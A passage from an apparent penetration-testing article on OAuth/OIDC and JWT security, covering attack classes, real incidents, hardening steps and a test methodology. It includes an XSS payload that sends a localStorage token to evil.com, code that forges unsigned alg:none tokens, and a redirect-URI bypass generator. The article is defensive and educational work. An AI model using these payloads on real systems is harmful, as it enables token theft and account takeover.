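payload = b64url(json.dumps({"sub": "admin", "iat": 1712620800},
                            separators=(",", ":")).encode())
forged = f"{header}.{payload}."   # trailing period, empty signature section

# A vulnerable verifier that honors alg:none accepts this token as valid.
assert forged.startswith("eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.")
assert forged.endswith(".")
```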
RSA/HMAC Key Confusion (Algorithm Substitution)
This attack exploits a fundamental difference between symmetric and asymmetric signature algorithms. When a JWT is signed with RSA (e.g., RS256), the authorization server uses its private key to sign the token, and the client or resource server uses the corresponding public key to verify the signature. The public key is, by definition, public -- it is often available at the authorization server's JWKS endpoint (/.well-known/jwks.json).
When a JWT is signed with HMAC (e.g., HS256), the same secret key is used for both signing and verification.
The attack works as follows:
- The target application normally uses RS256 to verify JWTs and is configured with the authorization server's RSA public key.
- The attacker obtains the RSA public key (from the JWKS endpoint or the server's TLS certificate).
- The attacker creates a JWT with "alg": "HS256" in the header and the desired claims in the payload.
- The attacker signs the JWT using HMAC-SHA256 with the RSA public key as the HMAC secret.
- When the server receives the token, a vulnerable JWT library reads the alg header, sees HS256, and uses the configured key (the RSA public key) as the HMAC verification key. Since the attacker signed the token with the same key, the signature is valid.
This attack is devastating because the RSA public key is public knowledge, meaning any attacker can forge valid tokens for any user. The fix is straightforward: the verification code must enforce the expected algorithm and never trust the alg header from the token itself. Modern JWT libraries provide an algorithms parameter that restricts which algorithms are accepted during verification.
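As an illustration of algorithm pinning, the following self-contained verifier uses HS256 so it needs no crypto library; a deployment verifying RS256 tokens would use one, but the principle is identical. All names here are illustrative. The essential point: the verifier, not the token's header, chooses the algorithm.

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def verify_jwt_pinned(token: str, key: bytes, expected_alg: str = "HS256") -> dict:
    """Verify a JWT while refusing any algorithm other than the pinned one."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    # The alg header is only checked for agreement with the pinned value;
    # it is never used to *select* the verification routine.
    if header.get("alg") != expected_alg:
        raise ValueError(f"rejected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(payload_b64))

# Legitimate token round-trip:
key = b"demo-shared-secret"
h = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
p = b64url(json.dumps({"sub": "alice"}).encode())
sig = b64url(hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest())
assert verify_jwt_pinned(f"{h}.{p}.{sig}", key)["sub"] == "alice"

# A token whose header claims "none" is rejected before any signature logic:
h_none = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
try:
    verify_jwt_pinned(f"{h_none}.{p}.", key)
    assert False
except ValueError:
    pass
```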
Signature Stripping
Some JWT implementations have a flaw where they validate the signature only if one is present. If the signature section of the JWT is completely removed (not just empty, but absent -- resulting in only two Base64URL-encoded sections separated by a single period), the validation logic may treat the token as unsigned and accept it without any verification.
This differs from the alg:none attack in that the header may still specify RS256 or another algorithm, but the signature is simply not present. The vulnerable code path typically looks like:
parts = token.split('.')
if len(parts) == 3:
    verify_signature(parts[0], parts[1], parts[2])
# If only 2 parts, signature verification is skipped entirely
payload = decode(parts[1])
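A hardened version of that pattern rejects anything that is not a well-formed three-part token instead of silently skipping verification. In this sketch, `verify_signature()` and `decode()` are stubs standing in for the application's real helpers:

```python
def verify_signature(header_b64, payload_b64, sig_b64):
    # Stub for illustration; a real implementation checks the HMAC/RSA signature
    if sig_b64 != "valid-sig":
        raise ValueError("invalid signature")

def decode(payload_b64):
    # Stub for illustration; a real implementation Base64URL-decodes and parses
    return {"payload": payload_b64}

def validate_token(token: str) -> dict:
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        # Two-part tokens and empty signature sections are rejected outright
        raise ValueError("malformed JWT: signature section missing")
    verify_signature(parts[0], parts[1], parts[2])
    return decode(parts[1])

assert validate_token("h.p.valid-sig") == {"payload": "p"}
for bad in ("h.p", "h.p."):  # stripped or empty signature
    try:
        validate_token(bad)
        raise AssertionError("should have been rejected")
    except ValueError:
        pass
```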
JWK Injection and jku/x5u Header Manipulation
The JWT header can include a jwk (JSON Web Key) claim that embeds the verification key directly in the token, a jku (JWK Set URL) claim that points to a URL containing the verification keys, or an x5u (X.509 URL) claim that points to a certificate chain. If the verification code trusts these claims without restriction:
- JWK injection: The attacker generates their own RSA key pair, includes the public key in the JWT's jwk header, signs the token with their private key, and the server uses the attacker-provided public key to verify the signature. Since the attacker controls both the signing key and the verification key, the signature is always valid.
- JKU/X5U manipulation: The attacker sets the jku or x5u header to a URL they control, hosts a JWKS or certificate at that URL containing their public key, and signs the token with their private key. The server fetches the attacker's key from the attacker's URL and uses it to verify the signature.
Mitigations include ignoring jwk, jku, and x5u headers in incoming tokens, using locally configured keys for verification, and if JWKS URLs must be dynamic, restricting them to a whitelist of trusted URLs.
Expired and Replayed Tokens
JWTs include an exp (expiration time) claim, but not all servers validate it. We regularly find servers that accept expired tokens, sometimes months or years after they were issued. Combined with token leakage from logs or browser history, this means that old tokens can be replayed to gain access.
Similarly, the aud (audience) claim should be validated to ensure the token was intended for the specific resource server. If a token issued for api-a.example.com is accepted by api-b.example.com, an attacker with access to any service in the ecosystem can use their tokens to access other services. This is known as a confused deputy attack.
Testing approach: When we test JWT validation, we use a systematic methodology: (1) test alg:none with multiple capitalizations, (2) test RSA/HMAC key confusion if the public key is available, (3) test JWK injection and JKU/X5U manipulation, (4) test with expired tokens, (5) test with tokens issued for a different audience, (6) modify individual claims (sub, role, permissions) and verify whether the server detects tampering, (7) test with completely invalid signatures to ensure signature verification is not bypassed. Tools like jwt_tool by ticarpi automate many of these tests.
Token Storage Mistakes: localStorage vs. httpOnly Cookies
How and where an application stores OAuth tokens after obtaining them is a critical security decision. The two most common storage mechanisms for browser-based applications are localStorage and HTTP-only cookies, and they have fundamentally different security properties.
The localStorage Problem
localStorage is a browser API that provides persistent key-value storage per origin. It is synchronous, easy to use, and available in all modern browsers. It is also the most common token storage mechanism we find in single-page applications. Unfortunately, it is also the least secure.
The fundamental problem with localStorage is that it is accessible to any JavaScript running on the page. If an attacker achieves cross-site scripting (XSS) on the application, they can read every token stored in localStorage with a single line of JavaScript:
// Attacker's XSS payload
fetch('https://evil.com/steal?token=' + localStorage.getItem('access_token'));
XSS vulnerabilities are extremely common. They appear in the OWASP Top 10 and are present in a substantial percentage of the web applications we test. Storing tokens in localStorage means that any XSS vulnerability -- reflected, stored, or DOM-based -- is automatically escalated to a complete account takeover. The attacker does not need to perform any additional steps; they simply read the token and use it from their own machine.
Additional problems with localStorage:
- Persistence: Tokens stored in localStorage persist until explicitly deleted. If a user's session is terminated server-side (logout, password change, session revocation), the token in localStorage remains valid until it expires. This makes server-side session invalidation ineffective.
- No expiration mechanism: localStorage has no built-in expiration. The application must implement its own expiration logic, and developers frequently forget to do so.
- Browser extension access: Browser extensions with sufficient permissions can read localStorage for any origin.
- Shared device risk: On shared devices, localStorage persists across browser sessions. If the user does not explicitly log out, the next user of the device can access the stored tokens.
sessionStorage -- Marginally Better
sessionStorage is similar to localStorage but scoped to the browser tab and cleared when the tab is closed. This mitigates the persistence and shared device risks, but it is still fully accessible to JavaScript and therefore vulnerable to XSS. It is a marginal improvement, not a solution.
HTTP-Only Secure Cookies
The recommended approach for browser-based applications is to store tokens in HTTP-only, secure, same-site cookies. The security properties are significant:
- HttpOnly flag: Prevents JavaScript from accessing the cookie. XSS attacks cannot read the token. This is the single most important protection against token theft via XSS.
- Secure flag: Ensures the cookie is only sent over HTTPS, preventing network-level interception.
- SameSite attribute: Controls whether the cookie is sent with cross-origin requests. SameSite=Strict prevents the cookie from being sent on any cross-origin request, which mitigates CSRF but can break legitimate cross-origin flows. SameSite=Lax sends the cookie on top-level navigations but not on cross-origin POST requests or subresource requests, providing a good balance of security and usability.
- Automatic expiration: Cookies have built-in expiration through the Max-Age or Expires attributes.
- Automatic transmission: The browser automatically includes cookies in requests to the matching domain, so the application does not need to manually attach the token to each API request. This eliminates an entire class of bugs where developers forget to include the authorization header.
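As a concrete illustration, Python's standard library can emit a Set-Cookie header carrying all of these flags. The cookie name, value, and 15-minute lifetime are arbitrary choices for the example; the value should be an opaque session reference, never the raw token:

```python
from http.cookies import SimpleCookie

# Illustrative session cookie; name, value, and lifetime are example choices.
cookie = SimpleCookie()
cookie["session_id"] = "opaque-session-reference"   # never the raw token
cookie["session_id"]["httponly"] = True   # invisible to JavaScript (blocks XSS reads)
cookie["session_id"]["secure"] = True     # sent over HTTPS only
cookie["session_id"]["samesite"] = "Lax"  # withheld on cross-origin POSTs
cookie["session_id"]["max-age"] = 900     # built-in expiration (15 minutes)

header = cookie.output(header="Set-Cookie:")
assert "HttpOnly" in header and "Secure" in header
assert "SameSite=Lax" in header and "Max-Age=900" in header
```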
The Backend-for-Frontend (BFF) Pattern
For single-page applications that use an authorization code flow, the recommended architecture is the Backend-for-Frontend (BFF) pattern. In this pattern, the SPA communicates with a lightweight backend server (the BFF) that handles the OAuth flow. The BFF stores the access token and refresh token server-side (in a session store), and the SPA authenticates to the BFF using an HTTP-only session cookie. The access token never reaches the browser.
This pattern provides the strongest security because tokens are never exposed to client-side JavaScript. The BFF acts as a confidential client (it has a client secret), can use PKCE for additional protection, and can implement token rotation and revocation without relying on client-side logic. The main drawback is the additional infrastructure complexity of maintaining a backend server for what would otherwise be a purely client-side application.
What we report: When we find tokens stored in localStorage, we report it as a medium-severity finding if no XSS vulnerability is present (because the risk is conditional on XSS), and as a high-severity finding if XSS is also present (because the combination enables direct account takeover). We always recommend migrating to HTTP-only cookies or the BFF pattern regardless of whether XSS is currently present, because XSS is a when-not-if proposition for most web applications.
Real-World Examples of OAuth Vulnerabilities in Production Applications
OAuth and OIDC vulnerabilities are not limited to small or poorly-maintained applications. Some of the most significant security incidents in major technology platforms have involved OAuth flaws. These examples illustrate the real-world impact of the vulnerability classes discussed in this article.
Facebook: OAuth Redirect URI Bypass Leading to Account Takeover (2013-2020, multiple instances)
Facebook's OAuth implementation has been a repeated target for security researchers. In 2013, researcher Nir Goldshlager discovered a series of redirect URI bypasses in Facebook's OAuth flow. By chaining open redirects on facebook.com subdomains with the OAuth authorization endpoint, he was able to steal access tokens for any Facebook user who clicked a malicious link. The attack chain leveraged the fact that Facebook allowed redirect URIs to any facebook.com subdomain, and several of these subdomains had open redirect vulnerabilities.
In subsequent years, multiple researchers found similar bypasses, including one in 2020 that leveraged a redirect URI validation flaw in combination with a dangling CNAME for a Facebook subdomain. Facebook paid significant bug bounties for these findings, but the pattern illustrates how difficult it is to get redirect URI validation right, even for organizations with world-class security teams.
Microsoft: Azure AD/Entra ID OAuth Misconfigurations
Microsoft's Entra ID (formerly Azure Active Directory) has been the subject of several high-profile OAuth security findings. In 2019, researchers from CyberArk demonstrated that misconfigured multi-tenant applications in Azure AD could be used to access other tenants' data by exploiting the consent framework. The attack involved registering a malicious application in one tenant, configuring it as multi-tenant, and tricking users in other tenants into granting consent. Because Azure AD's default settings allowed users to consent to applications requesting basic permissions, the attack could be executed without any administrator involvement.
In 2023, the "nOAuth" vulnerability, disclosed by researchers at Descope, demonstrated how a common misconfiguration in Azure AD OIDC integrations could lead to account takeover. Many applications used the email claim from Azure AD ID tokens as the unique identifier for users. However, Azure AD allows users to set arbitrary email addresses in their profile, and does not guarantee that the email claim has been verified. An attacker could set their Azure AD profile email to the victim's email address, authenticate to the target application via OIDC, and the application would match them to the victim's account based on the email claim. Microsoft's guidance was updated to recommend using the sub (subject) claim or oid (object ID) as the user identifier, as these are immutable and unique.
Slack: OAuth Token Leakage via Referer Headers (2019)
Security researcher Evan Custodio discovered that Slack's OAuth implementation leaked access tokens through referrer headers. When a user completed the OAuth flow for a Slack application, the callback page included third-party tracking scripts. The full callback URL, including the authorization code, was sent to these third-party servers via the Referer header. While the authorization codes were short-lived, the timing window was sufficient for automated exploitation. Slack fixed the issue by implementing Referrer-Policy: no-referrer on their callback pages and switching to response_mode=form_post.
GitHub: OAuth State Parameter Bypass (2012)
In one of the earliest and most impactful OAuth CSRF attacks, researcher Egor Homakov demonstrated a login CSRF vulnerability in GitHub's OAuth implementation. GitHub's "Sign in with GitHub" flow for third-party applications did not validate the state parameter. Homakov was able to force other users to link their GitHub accounts to his third-party application, giving him access to their private repositories. This finding led to widespread awareness of the state parameter's importance and prompted many OAuth libraries to include state validation by default.
Google: OAuth Scope Escalation in Google Apps Script
In 2017, a sophisticated phishing attack leveraged Google's OAuth consent flow to trick users into granting a malicious application full access to their Gmail accounts. The attack used a legitimate-looking application named "Google Docs" that requested the https://mail.google.com/ scope, which grants complete access to the user's Gmail. The consent screen showed the request was from "Google Docs" (a name the attacker chose, not the official Google application), and many users approved it without reading the scope details. This attack demonstrated that consent screens alone are insufficient to prevent scope-based attacks when users are conditioned to click "Allow" without reading the fine print.
Various Bug Bounty Programs: JWT alg:none in Production
The alg:none JWT vulnerability has been reported in bug bounty programs for numerous major organizations. In 2020, a researcher discovered that a major financial institution's API gateway accepted JWTs with alg:none, allowing them to forge tokens as any user, including administrators. The root cause was that the API gateway used an outdated JWT library that accepted unsigned tokens by default. In another case, a healthcare platform's API accepted alg:none tokens, enabling access to patient medical records. These findings consistently receive critical severity ratings in bug bounty programs.
Lessons From the Real World
Several patterns emerge from these real-world examples:
- The vulnerability is almost never in the specification itself. OAuth 2.0 and OIDC, when implemented according to current best practices (RFC 9700), are secure protocols. The vulnerabilities are in the implementations -- incomplete validation, missing parameters, insecure defaults, and configuration errors.
- Major technology companies are not immune. Facebook, Google, Microsoft, Slack, and GitHub -- organizations with some of the largest and most experienced security teams in the world -- have all had OAuth vulnerabilities. If these organizations get it wrong, smaller development teams are even more likely to have issues.
- Chaining is common. Many OAuth exploits involve chaining multiple lower-severity vulnerabilities. An open redirect (typically rated low severity) combined with a redirect URI validation flaw becomes a critical account takeover. An XSS vulnerability combined with token storage in
localStoragebecomes complete session compromise. When assessing OAuth security, it is essential to consider how individual findings can be chained. - The impact is consistently high. OAuth vulnerabilities almost always lead to account takeover or unauthorized data access. Because OAuth controls authentication and authorization, any flaw in its implementation directly compromises the application's core security boundary.
How Organizations Should Configure OAuth 2.0 and OpenID Connect
Based on our penetration testing experience and the current security best practices defined in RFC 9700 (OAuth 2.0 Security Best Current Practice) and the OpenID Connect specifications, here are the concrete steps organizations should take to secure their OAuth/OIDC implementations.
Authorization Server Configuration
- Enforce exact redirect URI matching. Do not allow prefix matching, wildcard patterns, or subdomain matching. Every redirect URI must be registered exactly as it will be used, including the scheme, host, port, and path. Query parameters should not be allowed in registered redirect URIs.
- Require PKCE for all clients. Configure the authorization server to require a code_challenge parameter on all authorization requests and a code_verifier on all token exchange requests. Reject requests that do not include PKCE parameters. Only accept the S256 challenge method; do not accept the plain method.
- Disable the implicit flow. Remove response_type=token and any hybrid response types that return tokens in the front channel. Only allow response_type=code.
- Enforce the state parameter. Reject authorization requests that do not include a state parameter. While the authorization server cannot validate the state value (only the client can), requiring its presence prevents the most common implementation error of omitting it entirely.
- Issue short-lived authorization codes. Authorization codes should expire within 30-60 seconds and be single-use. After an authorization code is exchanged, it must be invalidated immediately. If an authorization code is presented a second time, revoke all tokens issued from that code.
- Issue short-lived access tokens. Access tokens should have a lifetime of 5-15 minutes for high-security applications and no more than 1 hour for standard applications. Use refresh tokens (with rotation) for longer sessions.
- Implement refresh token rotation. When a refresh token is used, issue a new refresh token and invalidate the old one. If an old refresh token is presented, assume it has been stolen and revoke all tokens in the grant.
- Bind tokens to clients. Access tokens should include the client_id of the client they were issued to, and resource servers should validate that the token's client matches the expected client.
- Use response_mode=form_post where possible. This delivers the authorization code via an HTTP POST body instead of the query string, mitigating referrer header leakage and browser history leakage.
Client Application Configuration
- Validate the state parameter on every callback. Generate a cryptographically random state value, store it in the server-side session or an HTTP-only cookie, include it in the authorization request, and verify it matches on the callback. Reject the callback if the state does not match or is missing.
- Implement PKCE. Generate a new code_verifier for every authorization request. Store it in the server-side session. Include the corresponding code_challenge in the authorization request and the code_verifier in the token exchange.
- Store tokens securely. Use HTTP-only, secure, same-site cookies for browser-based applications. For server-side applications, store tokens in an encrypted server-side session store. Never store tokens in localStorage, sessionStorage, or non-HTTP-only cookies.
- Clean up the URL after the callback. After exchanging the authorization code, redirect the user to a clean URL using a server-side redirect (302) or history.replaceState(). This removes the authorization code from the browser's address bar and history.
- Set Referrer-Policy: no-referrer on the callback page. This prevents the authorization code from leaking to third-party servers via referrer headers. Better yet, set this policy site-wide.
- Validate all JWT claims. When verifying JWTs (ID tokens, access tokens), validate all of the following: signature (using a pre-configured key, not the key from the token header), algorithm (enforce expected algorithm, reject unexpected algorithms), issuer (iss), audience (aud), expiration (exp), and issued-at (iat).
- Use a well-maintained JWT library. Do not implement JWT parsing and validation manually. Use a library that is actively maintained, has a strong security track record, and defaults to secure behavior. Configure the library to accept only the expected algorithm and reject alg:none.
Resource Server (API) Configuration
- Validate token scopes on every request. Each API endpoint should verify that the access token's scope is sufficient for the requested operation. Do not accept any valid token for any endpoint.
- Validate the audience claim. The resource server should verify that the access token's aud claim matches its own identifier. This prevents tokens issued for other resource servers from being accepted.
- Implement token introspection for opaque tokens. If using opaque (non-JWT) access tokens, use the authorization server's token introspection endpoint (RFC 7662) to verify the token's validity, scope, and associated user. Cache introspection results for the token's remaining lifetime to avoid excessive calls to the introspection endpoint.
- Do not log tokens. Configure access logs, application logs, and error reporting to redact authorization headers and any request parameters that contain tokens. Use structured logging that allows selective redaction of sensitive fields.
Identity Provider Selection and Configuration
- Choose an identity provider that supports current best practices. The identity provider should support PKCE enforcement, exact redirect URI matching, response_mode=form_post, short-lived authorization codes, refresh token rotation, and token revocation.
- Review default settings. Many identity providers have insecure defaults (implicit flow enabled, PKCE optional, wildcard redirect URIs allowed). Review every OAuth-related setting after initial configuration.
- Restrict user consent. In enterprise environments, consider requiring administrator consent for all third-party applications. This prevents phishing attacks that trick users into granting access to malicious applications.
- Use the sub claim for user identification. Do not use the email claim as the primary user identifier. The email claim may not be verified, may change over time, and may not be unique across identity providers. Use the sub (subject) claim, which is guaranteed to be unique within the issuer.
Common OAuth 2.0 and OIDC Vulnerabilities: Severity, Frequency, and Impact
The following table summarizes the most common OAuth/OIDC vulnerabilities we discover during penetration testing engagements, their typical severity ratings, how frequently we encounter them, and their potential impact.
| Vulnerability | Severity | Frequency | Impact |
|---|---|---|---|
| Redirect URI Validation Bypass | Critical | Common | Authorization code or token theft leading to full account takeover |
| Missing PKCE Enforcement | High | Very Common | Authorization code interception on public clients; defense-in-depth failure on confidential clients |
| Implicit Flow in Use | High | Common | Token exposure via browser history, referrer headers, and XSS |
| Missing or Invalid State Parameter | Medium-High | Very Common | Login CSRF, account linking CSRF, session fixation |
| JWT alg:none Accepted | Critical | Uncommon | Complete token forgery; impersonate any user including administrators |
| JWT RSA/HMAC Key Confusion | Critical | Uncommon | Complete token forgery using publicly available key material |
| JWT Signature Not Verified | Critical | Rare | Complete token forgery; arbitrary claim modification |
| Tokens in localStorage | Medium | Very Common | Token theft via XSS; escalates XSS to full account takeover |
| Token Leakage via Referrer | Medium | Common | Authorization code or token exposure to third-party servers |
| Scope Not Validated by API | High | Common | Privilege escalation; access to unauthorized API operations |
| Scope Escalation via Parameter Tampering | High | Moderate | Elevated access beyond user consent; data exfiltration |
| Expired Tokens Accepted | Medium | Common | Session replay; unauthorized access using stale credentials |
| Audience Claim Not Validated | Medium-High | Common | Cross-service token replay; confused deputy attacks |
| PKCE Downgrade Attack | High | Moderate | Negates PKCE protection; enables authorization code interception |
| Consent Screen Bypass | Medium-High | Moderate | Silent scope escalation; unauthorized data access without user awareness |
| JWK/JKU Header Injection | Critical | Rare | Complete token forgery via attacker-controlled verification key |
| Refresh Token Not Rotated | Medium | Common | Persistent access if refresh token is compromised; no detection mechanism |
| Client Secret Exposed | High | Moderate | Allows attacker to impersonate the client; exchange stolen authorization codes |
Several observations are worth noting from this data. The most critical vulnerabilities (alg:none, key confusion, JWK injection) are fortunately rare in modern applications because JWT libraries have improved their defaults. However, the most common vulnerabilities (missing PKCE, missing state parameter, tokens in localStorage, scope not validated) are widespread precisely because they are not dramatic failures -- they are misconfigurations and omissions that do not cause visible errors. Applications work perfectly with these issues present, and they are only discovered through security testing.
The combination of high-frequency, medium-severity vulnerabilities (like tokens in localStorage) with common but often low-priority vulnerabilities (like XSS) produces critical-impact attack chains. This is why OAuth security testing must be holistic: evaluating each component in isolation misses the compounding effect of combined vulnerabilities.
Advanced OAuth Attack Techniques Pentesters Should Know
Beyond the core vulnerability classes, several advanced attack techniques target specific aspects of OAuth/OIDC implementations. These techniques are commonly used in sophisticated penetration tests and red team engagements.
Authorization Code Injection
Authorization code injection is an attack where an attacker injects their own authorization code into a victim's OAuth flow. This is different from authorization code interception (where the attacker steals the victim's code). In an injection attack, the attacker initiates an OAuth flow, obtains their own authorization code, and then tricks the victim's browser into sending this code to the client's callback endpoint. If the client does not validate the state parameter (or if PKCE is not enforced), the client exchanges the attacker's code for the attacker's tokens and creates a session associated with the attacker's identity.
The impact depends on the application's behavior. If the application links the OAuth identity to the victim's existing session, the victim's account is now linked to the attacker's identity provider account, giving the attacker persistent access. This is a more sophisticated version of the CSRF attack described in the state parameter section, and it specifically targets applications where OAuth is used for account linking rather than primary authentication.
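The primary defense is binding each authorization request to the browser session with a single-use `state` value and rejecting any callback whose `state` does not match. A minimal sketch, assuming server-side session storage (the `session` dict and function names here are illustrative, not a specific framework's API):

```python
import secrets


def issue_state(session: dict) -> str:
    """Generate a random state, bind it to the user's session, and return
    it for inclusion in the authorization request."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def verify_state(session: dict, returned_state) -> bool:
    """Validate the state echoed back on the OAuth callback. The stored
    value is popped so each state is single-use, which also blocks code
    injection via a replayed callback URL."""
    expected = session.pop("oauth_state", None)
    if expected is None or returned_state is None:
        return False
    # Constant-time comparison avoids timing side channels.
    return secrets.compare_digest(expected, returned_state)
```

A callback arriving with no pending state, a mismatched state, or a reused state is rejected, which closes the injection path described above.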
Token Replay Across Services
In microservice architectures, a single authorization server often issues tokens used by multiple resource servers. If the aud (audience) claim is not validated by individual resource servers, a token obtained from one service can be replayed against another. For example, an employee with access to the "reporting" service can take their access token and use it to call the "admin" service if both services trust tokens from the same authorization server and neither validates the audience.
This attack is particularly effective in Kubernetes environments where service-to-service authentication uses JWTs from a common issuer. We have demonstrated this attack in multiple engagements by intercepting a JWT from a low-privilege service and replaying it against high-privilege API endpoints.
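The fix is an audience check at every resource server, before any other authorization logic. Per RFC 7519 the `aud` claim may be a single string or an array of strings; a sketch (function name is our own) that handles both:

```python
def audience_accepts(claims: dict, expected_aud: str) -> bool:
    """Return True only if this service's identifier appears in the
    token's aud claim; tokens with no audience at all are rejected."""
    aud = claims.get("aud")
    if aud is None:
        return False
    if isinstance(aud, str):
        return aud == expected_aud
    # RFC 7519 allows aud to be an array of strings.
    return expected_aud in aud
```

With this check in place, the "reporting" token above is rejected by the "admin" service even though both trust the same issuer and signing key.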
ID Token Reuse and Replay
OIDC ID tokens are intended for authentication -- verifying the user's identity at the time of login. They are not access tokens and should not be used for authorization. However, many applications use ID tokens as bearer tokens for API access, sending them in the Authorization header with each request. This creates several problems: ID tokens may have longer lifetimes than appropriate for API access, they may not include scope or permission claims, and they are not designed to be presented to resource servers (the aud claim in an ID token is the client application, not the resource server).
When ID tokens are used as access tokens, an attacker who obtains an ID token (through any of the leakage vectors described earlier) can replay it against the API for the token's entire lifetime.
Device Authorization Flow Abuse
The OAuth 2.0 Device Authorization Grant (RFC 8628) is designed for devices with limited input capabilities (smart TVs, IoT devices). The flow presents a user code that the user enters on a different device. Phishing attacks abuse this flow by presenting the user code in a social engineering context: the attacker initiates a device authorization flow, receives the user code, and sends it to the victim via email or chat with a message like "Enter this code to verify your identity." The victim enters the code, authorizes the attacker's device, and the attacker receives tokens for the victim's account.
This attack is particularly effective against Microsoft Entra ID and has been used in real-world phishing campaigns targeting enterprise organizations. The defense is to restrict the device authorization flow to clients that actually need it and to educate users about the risk of entering device codes from unsolicited messages.
Race Conditions in Token Exchange
Some authorization servers have race conditions in their token exchange endpoints. If two simultaneous requests present the same authorization code, both may succeed and return valid tokens before the server marks the code as used. An attacker who can replay the authorization code within a narrow timing window (typically milliseconds) can obtain their own set of tokens from the same authorization code. This is a difficult attack to execute in practice but is testable by sending concurrent requests from a penetration testing tool.
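On the defensive side, the fix is to make the check-and-mark of the authorization code atomic. In a real deployment that means an atomic database operation (e.g., a conditional delete); the in-memory sketch below uses a lock and `dict.pop` to illustrate the property:

```python
import threading


class AuthorizationCodeStore:
    """Illustrative single-use code store. redeem() atomically checks and
    removes the code, so concurrent requests cannot both succeed."""

    def __init__(self):
        self._issued = {}  # code -> token payload
        self._lock = threading.Lock()

    def issue(self, code: str, token: str) -> None:
        with self._lock:
            self._issued[code] = token

    def redeem(self, code: str):
        with self._lock:
            # pop is the atomic check-and-mark: only the first caller
            # gets the token; every later (or concurrent) caller gets None.
            return self._issued.pop(code, None)
```

A store built this way passes the concurrent-redemption test that the race-condition attack exploits: out of N simultaneous exchanges of the same code, exactly one succeeds.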
A Penetration Tester's Methodology for OAuth/OIDC Assessment
When we assess OAuth/OIDC implementations during a web application penetration test, we follow a systematic methodology that covers every vulnerability class discussed in this article. This section outlines our approach for security teams looking to conduct their own assessments.
Phase 1: Reconnaissance and Flow Mapping
Before testing for vulnerabilities, we map the entire OAuth flow by intercepting every request and response using Burp Suite or a similar proxy. The key information we gather includes:
- The authorization endpoint URL and supported parameters
- The `response_type` in use (code, token, id_token, or hybrid)
- Whether PKCE parameters (`code_challenge`, `code_challenge_method`) are present
- Whether the `state` parameter is present and appears random
- The registered `redirect_uri` values
- The requested `scope` values
- The token endpoint URL and authentication method (`client_secret_post`, `client_secret_basic`, `private_key_jwt`)
- The token format (JWT or opaque)
- Where tokens are stored on the client (cookies, localStorage, sessionStorage, memory)
- The OIDC discovery endpoint (`/.well-known/openid-configuration`) and JWKS endpoint (`/.well-known/jwks.json`)
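Much of this reconnaissance can be read straight from the discovery document. A sketch that flags weak configurations in a fetched `openid-configuration` JSON (the field names come from the OIDC Discovery spec; the findings strings are our own):

```python
def audit_discovery(doc: dict) -> list:
    """Flag risky settings advertised in an OIDC discovery document."""
    findings = []

    # Any response type other than "code" means implicit or hybrid flow.
    response_types = doc.get("response_types_supported", [])
    if any(rt != "code" for rt in response_types):
        findings.append("implicit or hybrid response types advertised")

    methods = doc.get("code_challenge_methods_supported", [])
    if "S256" not in methods:
        findings.append("PKCE S256 not advertised")
    if "plain" in methods:
        findings.append("plain PKCE method allowed")

    if "none" in doc.get("token_endpoint_auth_methods_supported", []):
        findings.append("unauthenticated token endpoint clients allowed")

    return findings
```

Running this against the discovery documents of every identity provider in scope gives a quick triage list before any manual testing begins.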
Phase 2: Redirect URI Testing
We systematically test the redirect URI validation by modifying the redirect_uri parameter in the authorization request:
- Change the path (e.g., `/callback` to `/callback/evil`)
- Add subdomains (e.g., `evil.app.example.com`)
- Change the scheme (e.g., `https` to `http`)
- Add a different port
- Use URL encoding for path components
- Test the userinfo component (e.g., `https://app.example.com@evil.com/callback`)
- Test with backslashes, fragments, null bytes, and Unicode characters
- Identify open redirects on the application domain and chain them
- Test with `localhost` and `127.0.0.1`
- Remove the `redirect_uri` parameter entirely to see if the server uses a default
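These mutations are easy to script. A sketch that derives a first round of bypass candidates from the registered value (the attacker host is a placeholder, and the variant list is a starting point, not exhaustive):

```python
from urllib.parse import urlsplit


def redirect_uri_variants(registered: str, attacker_host: str = "evil.example") -> list:
    """Generate redirect_uri bypass candidates from a registered URI."""
    p = urlsplit(registered)
    return [
        registered.rstrip("/") + "/evil",                      # path suffix
        registered.replace("https://", "http://", 1),          # scheme downgrade
        f"{p.scheme}://evil.{p.netloc}{p.path}",               # added subdomain
        f"{p.scheme}://{p.hostname}:8080{p.path}",             # different port
        f"{p.scheme}://{p.netloc}@{attacker_host}{p.path}",    # userinfo trick
        f"{p.scheme}://{p.netloc}{p.path}%2e%2e%2f",           # encoded traversal
        f"{p.scheme}://{attacker_host}{p.path}#{p.netloc}",    # fragment confusion
    ]
```

Each candidate is substituted into the `redirect_uri` parameter of a fresh authorization request; any variant that reaches the consent screen (or worse, the callback) is a finding.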
Phase 3: Token Security Testing
For JWT tokens, we perform the full suite of JWT attacks:
- Test `alg:none` with multiple capitalizations
- Test RSA/HMAC key confusion using the public key from the JWKS endpoint
- Test JWK injection (embedding our key in the token header)
- Test JKU/X5U manipulation (pointing to our controlled JWKS endpoint)
- Modify claims (`sub`, `role`, `email`, `permissions`) and verify whether the server detects tampering
- Test with expired tokens
- Test with tokens intended for a different audience
- Test with completely invalid signatures
- Test with stripped signatures (two-part token)
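The `alg:none` test case needs nothing but base64url encoding, since an unsigned JWT is just two JSON segments followed by an empty signature. A sketch:

```python
import base64
import json


def _b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_alg_none(claims: dict, alg: str = "none") -> str:
    """Build an unsigned JWT. Pass alg variants like 'None' or 'NONE'
    to probe case-insensitive validators."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    return f"{header}.{payload}."  # trailing dot: empty signature segment
```

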